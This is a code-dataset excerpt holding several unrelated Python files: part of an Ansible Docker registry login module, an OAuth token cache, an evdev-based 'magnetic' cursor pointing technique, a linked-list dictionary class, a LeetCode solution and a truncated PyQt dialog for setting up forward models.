dockercfg_path=self.config_path\n )\n except Exception as exc:\n self.fail(\"Logging into %s for user %s failed - %s\" % (self.registry_url, self.username, str(exc)))\n\n # If user is already logged in, then response contains password for user\n # This returns correct password if user is logged in and wrong password is given.\n if 'password' in response:\n del response['password']\n self.results['login_result'] = response\n\n if not self.check_mode:\n self.update_config_file()\n\n def logout(self):\n '''\n Log out of the registry. On success update the config file.\n TODO: port to API once docker.py supports this.\n\n :return: None\n '''\n\n cmd = [self.client.module.get_bin_path('docker', True), \"logout\", self.registry_url]\n # TODO: docker does not support config file in logout, restore this when they do\n # if self.config_path and self.config_file_exists(self.config_path):\n # cmd.extend([\"--config\", self.config_path])\n\n (rc, out, err) = self.client.module.run_command(cmd)\n if rc != 0:\n self.fail(\"Could not log out: %s\" % err)\n if 'Not logged in to ' in out:\n self.results['changed'] = False\n elif 'Removing login credentials for ' in out:\n self.results['changed'] = True\n else:\n self.client.module.warn('Unable to determine whether logout was successful.')\n\n # Adding output to actions, so that user can inspect what was actually returned\n self.results['actions'].append(to_text(out))\n\n def config_file_exists(self, path):\n if os.path.exists(path):\n self.log(\"Configuration file %s exists\" % (path))\n return True\n self.log(\"Configuration file %s not found.\" % (path))\n return False\n\n def create_config_file(self, path):\n '''\n Create a config file with a JSON blob containing an auths key.\n\n :return: None\n '''\n\n self.log(\"Creating docker config file %s\" % (path))\n config_path_dir = os.path.dirname(path)\n if not os.path.exists(config_path_dir):\n try:\n os.makedirs(config_path_dir)\n except Exception as exc:\n self.fail(\"Error: failed to create %s - %s\" % (config_path_dir, str(exc)))\n self.write_config(path, dict(auths=dict()))\n\n def write_config(self, path, config):\n try:\n with open(path, \"w\") as file:\n json.dump(config, file, indent=5, sort_keys=True)\n except Exception as exc:\n self.fail(\"Error: failed to write config to %s - %s\" % (path, str(exc)))\n\n def update_config_file(self):\n '''\n If the authorization not stored in the config file or reauthorize is True,\n update the config file with the new authorization.\n\n :return: None\n '''\n\n path = self.config_path\n if not self.config_file_exists(path):\n self.create_config_file(path)\n\n try:\n # read the existing config\n with open(path, \"r\") as file:\n config = json.load(file)\n except ValueError:\n self.log(\"Error reading config from %s\" % (path))\n config = dict()\n\n if not config.get('auths'):\n self.log(\"Adding auths dict to config.\")\n config['auths'] = dict()\n\n if not config['auths'].get(self.registry_url):\n self.log(\"Adding registry_url %s to auths.\" % (self.registry_url))\n config['auths'][self.registry_url] = dict()\n\n b64auth = base64.b64encode(\n to_bytes(self.username) + b':' + to_bytes(self.password)\n )\n auth = to_text(b64auth)\n\n encoded_credentials = dict(\n auth=auth,\n email=self.email\n )\n\n if config['auths'][self.registry_url] != encoded_credentials or self.reauthorize:\n # Update the config file with the new authorization\n config['auths'][self.registry_url] = encoded_credentials\n self.log(\"Updating config file %s with new authorization for %s\" % (path, self.registry_url))\n self.results['actions'].append(\"Updated config file %s with new authorization for %s\" % (\n path, self.registry_url))\n self.results['changed'] = True\n self.write_config(path, config)\n\n\ndef main():\n\n argument_spec = dict(\n registry_url=dict(type='str', default=DEFAULT_DOCKER_REGISTRY, aliases=['registry', 'url']),\n username=dict(type='str'),\n password=dict(type='str', no_log=True),\n email=dict(type='str'),\n reauthorize=dict(type='bool', default=False, aliases=['reauth']),\n state=dict(type='str', default='present', choices=['present', 'absent']),\n config_path=dict(type='path', default='~/.docker/config.json', aliases=['dockercfg_path']),\n )\n\n required_if = [\n ('state', 'present', ['username', 'password']),\n ]\n\n client = AnsibleDockerClient(\n argument_spec=argument_spec,\n supports_check_mode=True,\n required_if=required_if,\n min_docker_api_version='1.20',\n )\n\n try:\n results = dict(\n changed=False,\n actions=[],\n login_result={}\n )\n\n LoginManager(client, results)\n if 'actions' in results:\n del results['actions']\n client.module.exit_json(**results)\n except DockerException as e:\n client.fail('An unexpected docker error occurred: {0}'.format(e), exception=traceback.format_exc())\n except RequestException as e:\n client.fail('An unexpected requests error occurred when docker-py tried to talk to the docker daemon: {0}'.format(e), exception=traceback.format_exc())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/docker/docker_login.py","file_name":"docker_login.py","file_ext":"py","file_size_in_byte":11588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632520164","text":"import json\nfrom nullroute.core import Core, Env\nimport nullroute.sec\nimport os\n\nclass OAuthTokenCache(object):\n TOKEN_SCHEMA = \"org.eu.nullroute.OAuthToken\"\n\n def __init__(self, domain, display_name=None):\n self.domain = domain\n self.display_name = display_name or domain\n self.token_path = Env.find_cache_file(\"token_%s.json\" % domain)\n\n def _store_token_libsecret(self, data):\n nullroute.sec.store_libsecret(\"OAuth token for %s\" % self.display_name,\n json.dumps(data),\n {\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n\n def _load_token_libsecret(self):\n data = nullroute.sec.get_libsecret({\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n return json.loads(data)\n\n def _clear_token_libsecret(self):\n nullroute.sec.clear_libsecret({\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n\n def _store_token_file(self, data):\n with open(self.token_path, \"w\") as fh:\n json.dump(data, fh)\n\n def _load_token_file(self):\n with open(self.token_path, \"r\") as fh:\n data = fh.read()\n return json.loads(data)\n\n def _clear_token_file(self):\n try:\n os.unlink(self.token_path)\n except FileNotFoundError:\n pass\n\n def load_token(self):\n Core.debug(\"loading OAuth token for %r\", self.domain)\n try:\n return self._load_token_libsecret()\n except KeyError:\n try:\n return self._load_token_file()\n except FileNotFoundError:\n pass\n except Exception as e:\n Core.debug(\"could not load %r: %r\", self.token_path, e)\n self.forget_token()\n return None\n\n def store_token(self, data):\n Core.debug(\"storing OAuth token for %r\", self.domain)\n self._store_token_libsecret(data)\n try:\n self._store_token_file(data)\n except Exception as e:\n Core.warn(\"could not write %r: %r\", self.token_path, e)\n\n def forget_token(self):\n Core.debug(\"flushing OAuth tokens for %r\", self.domain)\n self._clear_token_libsecret()\n self._clear_token_file()\n\n","sub_path":"lib/python/nullroute/sec/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383941736","text":"import math\nimport time\n\nfrom PyQt5 import QtWidgets\nfrom evdev import UInput, ecodes as e\n\n\"\"\"\nOur pointing technique supports users by moving the cursor to the target when it is near the target.\nIt seems as if the target is magnetic. In fact, we use linear interpolation to move the mouse to the target.\nThe following sources have been consulted for the implementation:\n - https://en.wikipedia.org/wiki/Linear_interpolation\n - https://stackoverflow.com/questions/49173095/how-to-move-an-object-along-a-line-given-two-points#49173439\n\nUpon initialization of the method, the target, a threshold value at which the indentation should start\nand the number of interpolation steps are transmitted.\nFor positioning the mouse UInput was used (see https://python-evdev.readthedocs.io/en/latest/usage.html and\nhttps://www.kernel.org/doc/html/v4.12/input/uinput.html).\n\nThe new pointing technique is executed when it is enabled in the config file and the mouse is moved.\nThe filter method used for this gets the current position of the mouse and moves the pointer to the\ntarget once the distance to the target is below the threshold.\n\nAs the user clicks at the target, the device closes to prevent the cursor from moving.\n\"\"\"\n\n\n# Author: Sarah\n# Reviewer: Claudia\nclass PointingTechnique:\n capabilities = {\n e.EV_REL: (e.REL_X, e.REL_Y),\n e.EV_KEY: (e.BTN_LEFT, e.BTN_RIGHT)\n }\n\n def __get_distance_to_target(self, pos):\n return math.dist([pos.x(), pos.y()], [self.__target_pos.x(), self.__target_pos.y()])\n\n def __is_in_target(self, pos):\n return self.__get_distance_to_target(pos) <= (self.__target.width() / 2)\n\n # Code based on:\n # https://en.wikipedia.org/wiki/Linear_interpolation\n # https://stackoverflow.com/questions/49173095/how-to-move-an-object-along-a-line-given-two-points#49173439\n def __move_to_target(self):\n if self.__moving or self.__is_in_target(self.__current_pos):\n return\n\n self.__moving = True\n\n n = self.__density # The smaller n is the \"faster\" the mouse becomes\n x0, y0 = self.__current_pos.x(), self.__current_pos.y()\n x1, y1 = self.__target_pos.x(), self.__target_pos.y()\n x_t0, y_t0 = x0, y0\n\n for i in range(0, n):\n if self.__is_in_target(self.__current_pos):\n return\n\n t = i / n\n x_t = (1.0 - t) * x0 + t * x1\n y_t = (1.0 - t) * y0 + t * y1\n\n rel_x = int(x_t - x_t0)\n rel_y = int(y_t - y_t0)\n\n self.__device.write(e.EV_REL, e.REL_X, rel_x)\n self.__device.write(e.EV_REL, e.REL_Y, rel_y)\n self.__device.syn()\n\n x_t0, y_t0 = x_t, y_t\n\n time.sleep(0.01)\n QtWidgets.qApp.processEvents()\n\n self.__moving = False\n\n def __init__(self, target, threshold, density):\n self.__moving = False\n self.__device = UInput(self.capabilities)\n self.__target = target\n self.__target_pos = self.__target.geometry().center()\n self.__current_pos = None\n\n self.__threshold = threshold\n self.__density = density\n\n def __del__(self):\n self.__device.close()\n\n def filter(self, current_pos):\n self.__current_pos = current_pos\n\n threshold = int(self.__target.parent().width() * self.__threshold)\n if self.__get_distance_to_target(current_pos) < threshold:\n self.__move_to_target()\n","sub_path":"pointing_technique.py","file_name":"pointing_technique.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"511104537","text":"from classLista import ListaLigada\nfrom classSuperLista import *\n\n\n\nclass Nodo_2: #esto era reina\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def copy(self):\n copy = Nodo_2(self.key, self.value)\n return copy\n\n def __repr__(self):\n return self.key\n\nclass Dict: #esto era colonia\n\n def __init__(self):\n self.nodos = Lista()\n\n def __setitem__(self, key, value):\n #Entrega un valor al elemento correspondiente a key\n in_list = False\n for nodo in self.nodos:\n if nodo.key == key:\n nodo.value = value\n in_list = True\n break\n if not in_list:\n self.append(key, value)\n nodo = key\n return nodo\n\n def __getitem__(self, key):\n #Entrega el elemento correspondiente a key\n for nodo in self.nodos:\n if nodo.key == key:\n return nodo.value\n raise IndexError(\"Llave no encontrada\")\n\n\n def __add__(self, valor):\n #Suma la Colonia valor a self\n suma = Dict()\n for nodo in self:\n suma.append(nodo)\n for nodo in valor:\n suma.append(nodo)\n return suma\n\n def __len__(self):\n #Retorna la cantidad de reinas en self\n return len(self.nodos)\n\n def __iter__(self):\n #Permite hacer for por Snake\n return Iterador(self.nodos.cabeza)\n\n def __repr__(self):\n rep = '{'\n check = False\n for nodo in self.nodos:\n check = True\n rep += '{0}: {1}, '.format(nodo.key, nodo.value)\n if check:\n rep = rep[:-2]\n rep += '}'\n return rep\n\n def append(self, nodo_2, value = None):\n #Agrega reina a la colonia con el valor hormigas\n elem = Nodo_2(nodo_2, value)\n self.nodos.append(elem)\n\n def __delitem__(self, key):\n #Elimina key y su valor de self\n check = False\n for nodo in self.nodos:\n if nodo.key == key:\n check = True\n break\n if check:\n p = self.nodos.find(nodo)\n new = Lista()\n for r in range(len(self.nodos)):\n if r != p:\n new.append(self.nodos[r])\n self.nodos = new\n else:\n raise IndexError(\"Posición no encontrada.\")\n\n def copy(self):\n #Retorna una copia de self\n copia = Dict()\n for nodo in self.nodos:\n copia.append(nodo.key, nodo.value)\n return copia\n\n def keys(self):\n lista = Lista()\n for elemento in self:\n lista.append(elemento)\n return lista\n\n def values(self):\n lista = Lista()\n for elemento in self:\n lista.append(self[elemento])\n return lista\n\n def items(self):\n lista = Lista()\n for elemento in self:\n lista_2 = Lista()\n lista.append(lista_2)\n lista_2.append(str(elemento))\n lista_2.append(self[elemento])\n\n return lista\n\n\nclass Iterador:\n\n def __init__(self, iterable):\n self.iterable = iterable\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.iterable is None:\n raise StopIteration(\"Llegamos al final\")\n else:\n to_return = self.iterable.valor\n self.iterable = self.iterable.siguiente\n return to_return\n","sub_path":"AVANZADA/T02/TAREA 2 testing codes/classDict.py","file_name":"classDict.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563746523","text":"class Solution:\n def smallestRepunitDivByK(self, K: int) -> int:\n if K & 1 == 0:\n return -1\n NL = 1\n N = 1\n remainSet = set()\n while True:\n remain = N % K\n if remain == 0:\n return NL\n if remain in remainSet:\n break\n remainSet.add(remain)\n NL += 1\n N = N * 10 + 1\n return -1\n\n\nsol = Solution()\nret = sol.smallestRepunitDivByK(2) # -1\nret = sol.smallestRepunitDivByK(3) # 3\nprint(ret)","sub_path":"src/smallest-integer-divisible-by-k.py","file_name":"smallest-integer-divisible-by-k.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259343670","text":"\"\"\"\nForward model and anatomy setup dialog.\n\nExposed classes\n---------------\nFwdSetupDialog: QDialog\n Dialog window which sets up subject, subjects_dir and forward model path\n\n\"\"\"\nimport os\nimport os.path as op\nimport inspect\nimport json\nimport shutil\nimport numpy as np\nimport logging\n\nimport mne\nfrom PyQt5.QtWidgets import (\n QDialog,\n QHBoxLayout,\n QLabel,\n QComboBox,\n QDialogButtonBox,\n QPushButton,\n QFileDialog,\n QRadioButton,\n QGroupBox,\n QVBoxLayout,\n QLineEdit,\n QWidget,\n QDoubleSpinBox,\n QMessageBox,\n QMainWindow,\n QCheckBox,\n QGridLayout,\n)\n\nfrom PyQt5.Qt import QSizePolicy, QTimer\nfrom PyQt5.QtCore import Qt, pyqtSignal, QSignalBlocker\nfrom cognigraph import COGNIGRAPH_DATA, MONTAGES_DIR\nfrom cognigraph.gui.async_pipeline_update import ThreadToBeWaitedFor\nfrom cognigraph.utils.io import download_anatomy_and_forwards\nfrom .montage_editor import MontageEditor\n\n\nclass _ResettableComboBox(QComboBox):\n \"\"\"\n Combobox with capability of setting all items\n anew and retrieving items as list.\n\n \"\"\"\n\n def __init__(self, *pargs, **kwargs):\n QComboBox.__init__(self, *pargs, **kwargs)\n\n def setItems(self, items):\n block_signals = QSignalBlocker(self) # noqa\n for i in range(self.count()):\n self.removeItem(0)\n self.addItems(items)\n\n def getItems(self):\n return [self.itemText(i) for i in range(self.count())]\n\n\nclass _PathSelectorWidget(QWidget):\n \"\"\"QLineEdit + QPushButton connected to QFileDialog to set path\"\"\"\n\n def __init__(self, dialog_caption, path=\"\", parent=None):\n QWidget.__init__(self, parent)\n self._path = None\n\n layout = QHBoxLayout()\n self.path_ledit = QLineEdit(path, readOnly=True)\n # Setup minimum lineedit_width so the path fits in\n fm = self.path_ledit.fontMetrics()\n min_lineedit_width = fm.boundingRect(COGNIGRAPH_DATA).width()\n self.path_ledit.setMinimumWidth(min_lineedit_width)\n self.path_ledit.setToolTip(self.path_ledit.text())\n self.path_ledit.textChanged.connect(self._set_lineedit_tooltip)\n self.browse_button = QPushButton(\"Browse\")\n self.browse_button.setDefault(False)\n self.browse_button.setAutoDefault(True)\n self.browse_button.clicked.connect(self._on_browse_clicked)\n layout.addWidget(self.path_ledit)\n layout.addWidget(self.browse_button)\n self.setLayout(layout)\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self._file_dialog = QFileDialog(\n caption=dialog_caption, directory=self.path_ledit.text()\n )\n\n def _set_lineedit_tooltip(self):\n self.path_ledit.setToolTip(self.path_ledit.text())\n\n def _on_browse_clicked(self):\n raise NotImplementedError\n\n @property\n def path(self):\n \"\"\"Path to folder or file selected in popup window\"\"\"\n return self._path\n\n @path.setter\n def path(self, value):\n self._path = value\n if value:\n self.path_ledit.setText(value)\n\n\nclass _FolderSelectorWidget(_PathSelectorWidget):\n \"\"\"\n QLineEdit + QPushButton connected to QFileDialog to set path to FOLDER\n\n \"\"\"\n\n def _on_browse_clicked(self):\n folder_path = self._file_dialog.getExistingDirectory()\n self.path = folder_path\n\n\nclass _FileSelectorWidget(_PathSelectorWidget):\n \"\"\"\n QLineEdit + QPushButton connected to QFileDialog to set path to FILE\n\n \"\"\"\n\n def __init__(self, dialog_caption, file_filter, path=\"\", parent=None):\n _PathSelectorWidget.__init__(self, dialog_caption, path, parent)\n self.filter = file_filter\n\n def _on_browse_clicked(self):\n file_path = self._file_dialog.getOpenFileName(filter=self.filter)[0]\n self.path = file_path\n\n\nclass _StateAwareGroupbox(QGroupBox):\n \"\"\"\n QGroupBox tracking valid-invalid and active-inactive state\n and emitting a signal when these states change.\n\n \"\"\"\n\n state_changed = pyqtSignal()\n\n def __init__(self, *pargs, **kwargs):\n QGroupBox.__init__(self, *pargs, **kwargs)\n self._is_valid = True\n self._is_active = True\n\n @property\n def is_valid(self):\n \"\"\"Represents validity of all input parameters\"\"\"\n return self._is_valid\n\n @is_valid.setter\n def is_valid(self, value):\n before = self.is_good\n self._is_valid = value\n after = self.is_good\n if before != after:\n self.state_changed.emit()\n\n @property\n def is_active(self):\n \"\"\"Represents disabled-enabled state of the groupbox\"\"\"\n return self._is_active\n\n @is_active.setter\n def is_active(self, value):\n before = self.is_good\n if value:\n self.show()\n else:\n self.hide()\n self._is_active = value\n after = self.is_good\n if before != after:\n self.state_changed.emit()\n\n @property\n def is_good(self):\n if self.is_active:\n return self.is_valid\n else:\n return True\n\n\nclass _FwdOptionsRadioButtons(QGroupBox):\n \"\"\"Groupbox with three radio buttons\"\"\"\n\n def __init__(self, title=\"Forward model\", parent=None):\n QGroupBox.__init__(self, title=title, parent=parent)\n\n self.use_default_fwd_radio = QRadioButton(\"&Use available forward\")\n self.use_default_fwd_radio.setChecked(True)\n\n self.compute_fwd_radio = QRadioButton(\"&Compute forward\")\n\n self.import_fwd_radio = QRadioButton(\"&Import forward\")\n\n forward_radio_layout = QVBoxLayout()\n forward_radio_layout.addWidget(self.use_default_fwd_radio)\n forward_radio_layout.addWidget(self.compute_fwd_radio)\n forward_radio_layout.addWidget(self.import_fwd_radio)\n\n self.setLayout(forward_radio_layout)\n\n\nclass _AnatGroupbox(_StateAwareGroupbox):\n \"\"\"Groupbox to setup subjects_dir and subject\"\"\"\n\n def __init__(\n self,\n title=\"Anatomy\",\n default_subj_dir=op.join(COGNIGRAPH_DATA, \"anatomy\"),\n default_subj=\"fsaverage\",\n subjects_dir=None,\n subject=None,\n parent=None,\n ):\n _StateAwareGroupbox.__init__(self, parent, title=title)\n self.default_subj_dir = default_subj_dir\n self.default_subj = default_subj\n self.subjects_dir = subjects_dir or self.default_subj_dir\n self.subject = subject or self.default_subj\n self.subjects = self._get_fsf_subjects(self.subjects_dir)\n # ------------------ anatomy gpbox ------------------ #\n self._use_avail_anat_radio = QRadioButton(\"&Use available anatomy\")\n self._use_avail_anat_radio.setChecked(True)\n self._use_avail_anat_radio.toggled.connect(self._on_toggled)\n self.import_anat_radio = QRadioButton(\"&Import anatomy\")\n self.import_anat_radio.setChecked(False)\n\n self.subject_combobox = _ResettableComboBox()\n self.subject_combobox.addItems(self.subjects)\n self.subject_combobox.setCurrentText(self.subject)\n subject_label = QLabel(\"Subject:\")\n subject_layout = QHBoxLayout()\n subject_layout.addWidget(subject_label)\n subject_layout.addWidget(self.subject_combobox)\n\n self.subjects_dir_widget = _FolderSelectorWidget(\n \"Select subjects directory\", path=self.subjects_dir\n )\n\n subjects_dir_subject_layout = QVBoxLayout()\n subjects_dir_subject_layout.addWidget(self.subjects_dir_widget)\n subjects_dir_subject_layout.addLayout(subject_layout)\n\n self.subjects_dir_widget.path_ledit.textChanged.connect(\n self._on_anat_path_changed\n )\n\n self.subject_combobox.currentTextChanged.connect(\n self._on_subject_combo_changed\n )\n\n self.anat_path_widget = QWidget()\n self.anat_path_widget.setLayout(subjects_dir_subject_layout)\n self.anat_path_widget.setSizePolicy(\n QSizePolicy.Minimum, QSizePolicy.Fixed\n )\n self.subjects_dir_widget.setDisabled(True)\n\n anat_gbox_layout = QVBoxLayout()\n anat_gbox_layout.addWidget(self._use_avail_anat_radio)\n anat_gbox_layout.addWidget(self.import_anat_radio)\n anat_gbox_layout.addWidget(self.anat_path_widget)\n\n self.setLayout(anat_gbox_layout)\n # ------------------------------------------------------ #\n\n def _on_toggled(self):\n if self._use_avail_anat_radio.isChecked():\n self.subjects_dir_widget.setDisabled(True)\n if self.subjects_dir != self.default_subj_dir:\n self.subjects_dir_widget.path_ledit.setText(\n self.default_subj_dir\n )\n self.is_valid = True\n else:\n if self.subjects_dir and self.subject:\n self.is_valid = True\n else:\n self.is_valid = False\n self.subjects_dir_widget.setDisabled(False)\n self.subjects_dir_widget.browse_button.setFocus()\n\n def _get_fsf_subjects(self, path):\n files = os.listdir(path)\n if not files:\n ans = QMessageBox.question(\n self,\n \"Default anatomy folder is empty\",\n \"Default anatomy is missing. Download?\",\n QMessageBox.Yes | QMessageBox.No,\n )\n if ans == QMessageBox.Yes:\n download_anatomy_and_forwards()\n files = os.listdir(path)\n return sorted(\n [\n f\n for f in files\n if op.isdir(op.join(path, f))\n and \"surf\" in os.listdir(op.join(path, f))\n ]\n )\n\n def _on_anat_path_changed(self):\n new_path = self.subjects_dir_widget.path_ledit.text()\n if new_path != self.subjects_dir:\n self.subjects = self._get_fsf_subjects(new_path)\n self.subject_combobox.setItems(sorted(self.subjects))\n self.subjects_dir = new_path\n # If valid freesurfer subjects were found:\n if self.subject_combobox.currentText():\n self.subjects_dir = self.subjects_dir\n self.subject = self.subject_combobox.currentText()\n self.is_valid = True\n else:\n self.is_valid = False\n\n def _on_subject_combo_changed(self):\n self.subject = self.subject_combobox.currentText()\n\n @property\n def is_use_available_anat(self):\n return self._use_avail_anat_radio.isChecked()\n\n\nclass _CustomMontageWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.checkbox = QCheckBox()\n checkbox_label = QLabel(\"&Use custom montage:\")\n checkbox_label.setBuddy(self.checkbox)\n self.button = QPushButton(\"&Edit\")\n self.button.setDisabled(True)\n self.lineedit = QLineEdit(\"custom montage\")\n\n self.checkbox.stateChanged.connect(self._on_checkbox_toggled)\n self.lineedit.setDisabled(True)\n self.lineedit.setReadOnly(True)\n self.lineedit.setToolTip(self.lineedit.text())\n self.lineedit.textChanged.connect(self._set_lineedit_tooltip)\n\n layout = QGridLayout()\n self.setLayout(layout)\n layout.addWidget(checkbox_label, 0, 0)\n layout.addWidget(self.checkbox, 0, 1)\n layout.addWidget(self.button, 0, 2)\n layout.addWidget(self.lineedit, 1, 0, 1, 3)\n self.hide()\n\n def _set_lineedit_tooltip(self):\n self.lineedit.setToolTip(self.lineedit.text())\n\n def _on_checkbox_toggled(self, state):\n if state:\n self.lineedit.setDisabled(False)\n self.button.setDisabled(False)\n else:\n self.lineedit.setDisabled(True)\n self.button.setDisabled(True)\n\n\nclass _FwdGeomGroupbox(_StateAwareGroupbox):\n \"\"\"\n Groupbox to setup spacing and montage and select forward from disk.\n\n If in choosing from available forwards mode, combobox values in spacing\n and montage correspond to folders in COGNIGRAPH_DATA.\n Availabled forwards are fetched from these folers.\n\n If in computing forward mode, montage combobox values come from mne-python\n get_builtin_montages function while spacing combobox values are\n preset to be from ['oct5', 'ico5', 'oct6', 'ico6'], which are\n octahedron and icosahedron tesselations of a sphere with number\n corresponding to the number of tesselation steps.\n\n \"\"\"\n\n default_montage = \"standard_1005\"\n default_spacing = \"oct6\"\n\n def __init__(\n self,\n default_subj,\n title=\"Select montage and spacing\",\n parent=None,\n data_chnames=None,\n ):\n _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n self._data_chnames = data_chnames\n self._anat_folder = None\n # self.is_valid = True\n # self.setToolTip('I`m here to help')\n\n # -------- setup paths and fetch montages -------- #\n self._get_builtin_montages()\n self._default_forwards_path = op.join(\n COGNIGRAPH_DATA, \"forwards\", default_subj\n )\n self.get_available_forwards(self._default_forwards_path)\n # self._is_montages_combo_connected = False # to spacings combo\n # ------------------------------------------------ #\n\n # -------- setup comboboxes -------- #\n self._montages_combo = _ResettableComboBox()\n self._montages_combo.currentTextChanged.connect(\n self._on_montage_combo_changed\n )\n # self._montages_combo.currentIndexChanged.connect(self._check_if_valid)\n montages_combo_label = QLabel(\"Select montage:\")\n montages_combo_label.setBuddy(self._montages_combo)\n montages_combo_layout = QHBoxLayout()\n montages_combo_layout.addWidget(montages_combo_label)\n montages_combo_layout.addWidget(self._montages_combo)\n self._montages_combo_widget = QWidget()\n self._montages_combo_widget.setLayout(montages_combo_layout)\n\n self._spacings_combo = _ResettableComboBox()\n self._spacings_combo.currentTextChanged.connect(\n self._on_spacings_combo_changed\n )\n spacings_label = QLabel(\"Select spacing:\")\n spacings_label.setBuddy(self._spacings_combo)\n spacings_combo_layout = QHBoxLayout()\n spacings_combo_layout.addWidget(spacings_label)\n spacings_combo_layout.addWidget(self._spacings_combo)\n self._spacings_combo_widget = QWidget()\n self._spacings_combo_widget.setLayout(spacings_combo_layout)\n\n self._forwards_combo = _ResettableComboBox()\n forwards_label = QLabel(\"Select forward operator:\")\n forwards_label.setBuddy(self._spacings_combo)\n forwards_combo_layout = QVBoxLayout()\n forwards_combo_layout.addWidget(forwards_label)\n forwards_combo_layout.addWidget(self._forwards_combo)\n self._forwards_combo_widget = QWidget()\n self._forwards_combo_widget.setLayout(forwards_combo_layout)\n # ---------------------------------- #\n\n self._use_default_montage_radio = QRadioButton(\"&Use default\")\n self._import_montage_radio = QRadioButton(\"&Import montage\")\n self._use_default_montage_radio.setChecked(True)\n self._use_default_montage_radio.toggled.connect(\n self._on_import_montage_radio_toggled\n )\n self._import_montage_radio.toggled.connect(\n self._on_import_montage_radio_toggled\n )\n\n self._select_montage_dialog = _FileSelectorWidget(\n dialog_caption=\"Select montage model\",\n path=\"\",\n file_filter=\"*.txt *.elc *.csd *.elp *.htps\"\n \" *.sfp *.loc *.locs *.eloc *.bvef\",\n )\n self._select_montage_dialog.path_ledit.textChanged.connect(\n self._on_montage_path_changed\n )\n # self._select_montage_dialog.path_ledit.textChanged.connect(\n # self._check_if_valid\n # )\n self._select_montage_dialog.setDisabled(True)\n\n self._custom_montage_widget = _CustomMontageWidget()\n self._custom_montage_widget.button.clicked.connect(\n self._on_edit_montage_button_clicked\n )\n self._custom_montage_widget.checkbox.stateChanged.connect(\n self._on_custom_montage_checkbox_toggled\n )\n # self._custom_montage_widget.lineedit.textChanged.connect(\n # self._check_if_valid\n # )\n\n # initialize combos with available forwards\n self.is_use_available = True\n\n # -------- setup layout -------- #\n default_fwd_layout = QVBoxLayout()\n default_fwd_layout.addWidget(self._use_default_montage_radio)\n default_fwd_layout.addWidget(self._montages_combo_widget)\n default_fwd_layout.addWidget(self._import_montage_radio)\n default_fwd_layout.addWidget(self._select_montage_dialog)\n default_fwd_layout.addWidget(self._custom_montage_widget)\n default_fwd_layout.addWidget(self._spacings_combo_widget)\n default_fwd_layout.addWidget(self._forwards_combo_widget)\n\n self.default_fwd_widget = QWidget()\n self.default_fwd_widget.setLayout(default_fwd_layout)\n self.default_fwd_widget.setSizePolicy(\n QSizePolicy.Minimum, QSizePolicy.Fixed\n )\n\n default_fwd_setup_layout = QVBoxLayout()\n default_fwd_setup_layout.addWidget(self.default_fwd_widget)\n\n self.setLayout(default_fwd_setup_layout)\n # ------------------------------ #\n # self._check_if_valid()\n\n def _get_builtin_montages(self):\n # called when choosing forward from available files on disk\n montages_desc_path = op.join(COGNIGRAPH_DATA, \"montages_desc.json\")\n with open(montages_desc_path, \"r\", encoding=\"utf8\") as f:\n description = json.load(f)\n self.montages_desc = description[\"montages\"]\n self.spacings_desc = description[\"spacings\"]\n self.builtin_montage_names = sorted(\n mne.channels.get_builtin_montages()\n )\n\n def get_available_forwards(self, folder):\n \"\"\"Fetch forwards from COGNIGRAPH_DATA folders structure\"\"\"\n self._anat_folder = folder\n p = folder\n if op.isdir(p):\n self._available_montages = sorted(\n [i for i in os.listdir(p) if op.isdir(op.join(p, i))]\n )\n else:\n self._available_montages = []\n self._available_forwards = {}\n for a in self._available_montages:\n spacings = os.listdir(op.join(p, a))\n self._available_forwards[a] = {}\n for s in spacings:\n forwards = [\n f\n for f in os.listdir(op.join(p, a, s))\n if f.endswith(\"fwd.fif\")\n ]\n self._available_forwards[a][s] = forwards\n\n def _set_hints(self):\n \"\"\"Set popup description messages to comboboxes\"\"\"\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n\n for i, key in enumerate(self._montages_combo.getItems()):\n try:\n self._montages_combo.setItemData(\n i, self.montages_desc[key], Qt.ToolTipRole\n )\n except KeyError:\n pass\n\n for i, key in enumerate(self._spacings_combo.getItems()):\n try:\n self._spacings_combo.setItemData(\n i, self.spacings_desc[key], Qt.ToolTipRole\n )\n except KeyError:\n pass\n\n def _set_combos_to_builtin(self):\n \"\"\"Used when we switch to compute forward mode\"\"\"\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n self._montages_combo.setItems(self.builtin_montage_names)\n self.montage = self.default_montage\n self._spacings_combo.setItems(\n [k for k in self.spacings_desc if k != \"imported\"]\n )\n self.spacing = self.default_spacing # uses spacing setter\n self._forwards_combo_widget.hide()\n self._set_hints()\n\n self._use_default_montage_radio.show()\n self._import_montage_radio.show()\n self._select_montage_dialog.show()\n self._custom_montage_widget.show()\n\n def _set_combos_to_available(self):\n \"\"\"Default option: load forward from cognigraph folders structure\"\"\"\n\n self._set_montages_combo_to_available()\n\n self._forwards_combo_widget.show()\n\n self._set_hints()\n self._use_default_montage_radio.hide()\n self._import_montage_radio.hide()\n self._select_montage_dialog.hide()\n self._custom_montage_widget.hide()\n\n def _set_montages_combo_to_available(self):\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n self._montages_combo.setItems(self._available_montages)\n self.montage = self.default_montage\n self._set_spacings_combo_to_available()\n\n def _set_spacings_combo_to_available(self):\n montage = self.montage\n if self._available_forwards:\n self._spacings_combo.setItems(\n 